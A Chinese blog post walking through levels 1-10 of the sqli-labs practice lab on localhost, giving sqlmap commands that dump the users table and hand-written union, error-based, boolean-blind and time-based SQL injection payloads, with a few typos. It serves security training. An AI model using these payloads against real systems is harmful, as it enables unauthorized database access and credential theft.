sqlilabs通关教程(1-10)(sqlmap+简单代码审计)持续更新

最新推荐文章于 2024-07-13 09:21:00 发布
最新推荐文章于 2024-07-13 09:21:00 发布
阅读量457 收藏
点赞数 1
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52328368/article/details/132794359
版权

less-1:

sqlmap

        首先爆数据库名:--dbs是爆数据库名,--batch直接默认输入,就不用我们默认输入Y了

python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --dbs --batch

        其次是爆表名:

python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 -D security --tables --batch

        第三步是爆列名:

sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 -D security -T users --column --batch

          第四步直接爆破数据

python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 -D security -T users -C id,username,password --dump --batch

代码审计

这里只用一个'就报错

手工注入

下面是我们手工注的过程:

oeder by 3不会报错,order by 4报错

http://localhost/sqli-labs-master/Less-1/?id=1' order by 4--+

http://localhost/sqli-labs-master/Less-1/?id=-1‘ union select 1,2,3--+

 http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,database(),3--+

 

http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3--+ 

http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3--+ 

 http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,(select group_concat(id,username,password) from security.users ),3--+ 

 到此结束,得到所以账号密码

以后的就不会写这么细了,都是大同小异

less-2

sqlmap

sqlmap直接跑就行了,和第一关一摸一样

代码审计

这里的$id没有任何符合,直接?id=1进行注入即可

手工注入 

把第一关?id=1'换成?id=1即可,其余和第一关一模一样

less-3 

sqlmap

sqlmap直接跑即可,和第一关一模一样

代码审计

我们id构造成1')就闭合了

手工注入 

换成id=1')--+即可,其余和第一关一摸一样

less-4 

sqlmap

和之前的一摸一样,直接跑就行

代码审计

观察代码构造一个")就可以形成闭合

手工注入 

id换了就行,其他和第一关一样

less-5 

sqlmap

直接跑就行,和之前一摸一样

代码审计

下面的代码29行看到只用一个'就形成闭合了,但是36行不显示内容,这里可以用到报错注入

手工注入

获取database

http://localhost/sqli-labs-master/Less-5/?id=-1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

 爆表名

http://localhost/sqli-labs-master/Less-5/?id=-1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+

爆列名

 http://localhost/sqli-labs-master/Less-5/?id=-1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)--+

 

 爆数据

localhost/sqli-labs-master/Less-5/?id=-1' and updatexml(1,concat(0x7e,(select group_concat(id,username,password) from security.users),0x7e),1)--+

less-6 

sqlmap

 直接跑就行,没任何改变

代码审计

这里直接构造"就完成闭合

手工注入

 只要把上一关'换成"即可,其他都一样

less-7

sqlmap

直接跑就行,没任何改变

代码审计

闭合直接构造?id=1'就闭合成功,后面看到页面只返回对和错,所以这里要用布尔盲注

手工注入

判断数据库名的长度,等于8的时候正常,等于9报错,说明长度为8

http://localhost/sqli-labs-master/Less-7/?id=1')) and length(database())>=8--+ 

 

然后爆database第一个字母

 后面都一样,把database()换成select table_name frin onformation_schrma....这些就行了

less-8 

sqlmap

和之前一样直接跑

代码审计

只用‘就构造成功了,成功闭合,这里也是布尔盲注

手工注入

和上一题一样,构造?id=1'即可

less-9

sqlmap

直接跑就行

代码审计

这里构造就是',不给报错信息这里用时间盲注

 手工注入

http://localhost/sqli-labs-master/Less-9/?id=1' and if(length(database())>2,sleep(5),1)--+

 http://localhost/sqli-labs-master/Less-9/?id=1' and if(substr(database(),1,1)='s',sleep(5),1)--+

 剩下的和之前差不多,大同小异

less-10

sqlmap

价格--level=5即可

python sqlmap.py -u http://localhost/sqli-labs-master/Less-10/?id=1 --dbs --batch --level=5

 后续都一样,大同小异

代码审计

和上一关一样,'换成"即可,其他都一样

手工注入 

和上一关一样,换成?id=1"即可

nxbug
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqlmapSQLi-LABS靶场 1-10
小明师傅博客
06-04 8103
今天我们来用sqlmap去做SQLi-LABS靶场 首先来讲一下基础命令 1.清除sqlmap缓存: 第一个办法:在C:\Users\dragoneyes.sqlmap\output,删除output里面的内容 第二个办法:sqlmap.py --purge 2.sqlmap -u 注入点 检测注入点是否可用 sqlmap -u 注入点 –batch 自动输入 暴库 sqlmap -u 注入点 –dbs //暴库 Web当前使用的数据库 sqlmap -u 注入点 –current-db //爆当前使用的库
Sqlmap使用(sqli-lab
Mccc_li的博客
05-06 3587
1.get使用方法: 1.查看是否有注入点:sqlmap -u 网址 2.爆出数据库名:sqlmap -u 网址 --dbs 5.爆出数据库的表名:sqlmap -u 网址 -D security --tables 6.爆出数据库的列名:sqlmap -u 网址 -D security -T users --columns 7.dump出数据:sqlmap -u -D security -...
sqlmap 通关sqli—labs less 1-10
zzxyccxc的博客
04-13 318
2.用 sqlmap 工具注入完毕后,C 盘 AppData 文件夹下会有缓存文件夹,不删掉的话会影响 SQL 注入结果,可用sqlmap.py --purge清理缓存。1.在实际检测过程中,sqlmap 会不停的询问,需要手工输入Y/N来进行下一步操作,可以使用参数。less 02-less 09和上面一样,修改完url跑出表名即可。2.使用 --current-db 可以爆出当前数据库名。3.爆出security数据库下的所有表。4.爆出users表下的所有字段。1.爆出所有数据库名。
sqllab靶场通过,及sql注入总结(注入点,sqlmap使用)
最新发布
m0_74402888的博客
07-13 1414
普通注入报错注入盲注SQL写马注入靶场练习。
【史上最全sqlmap通关sqli-labs靶场教程
DMXA的博客
10-15 3280
【史上最全sqlmap通关sqli-labs靶场教程
sqlmap sqli-labs
u012922879的博客
08-26 3358
测试靶场:http://127.0.0.1/sqli-labs-master/Less-1/?id=5 sqlmap选项 目标:至少要选中一个参数 -u URL, –url=URL 目标为 URL (例如. “http://www.site.com/vuln.php?id=1“) -g GOOGLEDORK 将谷歌dork的结果作为目标url 请求: ...
mysql注入-sqlilabs靶场注入
10-15
教程基于SQLiLabs靶场,将深入探讨MySQL注入的各种技术和防御策略。 SQLiLabs是专门为学习和实践SQL注入技能设计的一个在线平台,它包含了多个级别,每个级别代表一个特定的注入场景,逐步提高难度。通过完成这些...
sql-labs 1-10关 含多种解法 包括sqlmap py脚本
07-23
### SQL-Labs 1-10关 解析与多种解法 #### Less-1:基本SQL注入 在这一关中,玩家将面对一个常见的SQL注入点。注入点出现在URL参数中,例如`?id=1'`。此关卡旨在考察用户是否了解SQL注入的基本原理及其应用。 **...
sqli-labs-master
08-22
sqli-labs-master是一个专为学习和实践SQL注入漏洞利用而设计的代码环境。这个项目提供了一系列逐步升级的练习,帮助用户了解SQL注入的工作原理、检测方法以及如何修复这些漏洞。 在sqli-labs-master中,你可以探索...
sqli-labs.rar
12-22
此外,随着你逐渐熟悉sqli-labs中的挑战,你可以尝试使用自动化工具如sqlmap进行自动化注入测试,这将帮助你理解攻击者可能使用的工具和技术。 最后,别忘了实践是最好的老师。完成sqli-labs的所有挑战后,你应该对...
第三节 Sqli-lab环境搭建-01
09-15
Sqli-labs是一个印度程序员写的,用来学习sql注入的一个游戏教程。我们需要打开sql-connections/db-creds.inc,修改默认数据库连接密码。Sqli-Lab提供了一个交互式的学习环境,帮助我们学习SQL注入漏洞检测和利用。 ...
Sqlmapsqli-lab上的一些使用
weixin_43570155的博客
08-19 1237
目录 1.get使用方法: 2.post使用方法: 3.header注入使用方法: 4.指定注入的位置: 5.盲注使用不接收http body: 6.设置多线程(可以设置的最大数量为10,默认为1): 7.预测输出: 8.持久连接: 9.指定数据库的探测 10.sqlmap脚本绕过(详细的脚本解释) 11.强制设置无效值替换: 12.自定义载荷(payload)位置 13.sqlmay设置tamper脚本: 14.sqlmap设置具体的注入技术: 15.查看当前用户以及是否是dba用户 16.枚举dbms的
最全sqlmap命令
gzy1616的博客
03-06 517
-search 搜索数据库名、表明、列名,需要与-D -T或-C 联用。--columns 在-D -T情况下输出表中所有列名。-C column 在-D -T情况下输出某列数据的值。--tables 在-D情况下输出库中所有表名。--file-dest 上传文件(指定目标机器路径)--file-write 上传文件(指定本地路径)
sqlmap学习(sqli-labs为示例)
quan9i的博客
02-17 4244
文章目录前言sql-map部分指令- -is-dba- -current-D,-T,-C- -dump-v--batchget类型检测可注入类型获取数据库获取表获取列名获取字段信息post类型准备工作检测可注入类型破解数据库方法一方法二破解数据表方法一方法二获取列名方法一方法二获取字段信息方法一方法二 前言 由于python学的啥也不是,脚本写的也很不咋滴(不会写),因此来学习sqlmap的使用,本人只是小白,如果出现错误还请各位师傅多多指正。 sql-map部分指令 - -is-dba --is-dba判
SQLmap使用方法,sqli-labs靶场
ZhangAweio的博客
04-10 506
SQL-map是一个非常强大的注入的工具,自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入,支持mysqlsql-service 等简单使用nmap进行查询数据。
sqlmap使用教程sqli-labs11-20)
小同的博客
05-22 746
sql-labs-less11~less17常规 POST 注入 sql-labs-less18 Header injection - Uagent sqlmap 在对user-agent 注入的时候,得在文件中的user-agent的参数后面加上 * 或者不加 * 号,调用 --level参数,将等级调至 3级,只有等级为 3级即以上时才能对 user-agent进行注入 sql-labs-less19 Header injection ...
sqli-labs sqlmap注入(包含sqlmap、burpsuite下载)
qq_51930350的博客
06-14 414
python sqlmap.py -u http://ip地址/sqli-labs/Less-2/?python sqlmap.py -u http://ip地址/sqli-labs/Less-2/?python sqlmap.py -u http://ip地址/sqli-labs/Less-2/?python sqlmap.py -u http://ip地址/sqli-labs/Less-2/?python sqlmap.py -u http://ip地址/sqli-labs/Less-2/?
sqli-labs之sqlmap初体验
rev1ve的博客
08-07 588
为了更深入学习sqlmap,打算对sqli-labs进行SQL注入测试学习内容包括不同的请求方式和请求参数,总之写下这篇博客记录我的学习过程。
sqlmapSQLi-LABS靶场 11-20关
小明师傅博客
06-05 3648
第11关 后面基本都是post注入了 不过我们用的是神器sqlmap 我们先随便输入,然后bp抓包 把抓到的包保存问txt格式 然后在sqlmap 指定他 用 -r sqlmap.py -r "C:\Users\Administrator\Desktop\post.txt" --leve=5 --sisk=3 --dbs 全部就扫出来啦 第12关 一模一样 第13关 多了两条,要用空值测试,线程默认10跑这个速度好慢 然后也是一模一样 14关 一模一样 15关 一模一样 16关-20关 都
sqli-labs sqlmap
10-02
sqli-labs是一个用于学习和测试SQL注入漏洞的开源项目。而sqlmap是一个常用的自动化SQL注入工具,可用于检测和利用SQL注入漏洞。在sqli-labs中,可以使用sqlmap来执行各种注入攻击,例如获取数据库名称、获取表、获取字段、获取数据等。 在使用sqlmap时,可以使用不同的参数和payload来执行不同的操作。例如,使用"--dbs"参数可以获取数据库名称,"-D"参数可以指定要操作的数据库,"--tables"参数可以获取表,"-T"参数可以指定要操作的表,"--columns"参数可以获取字段,"--dump"参数可以获取数据等。 以下是一些使用sqlmapsqli-labs中执行注入攻击的示例: 1. 获取数据库名称: python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --dbs 2. 获取表: python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --dbs -D mysql --tables 3. 获取字段: python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --dbs -D mysql -T user --columns 4. 获取数据: python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --dbs -D mysql -T user --dump 请注意,在进行任何安全测试操作之前,应该确保已经取得了合法的授权,并且仅在合法的环境中进行。 以下是一些
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值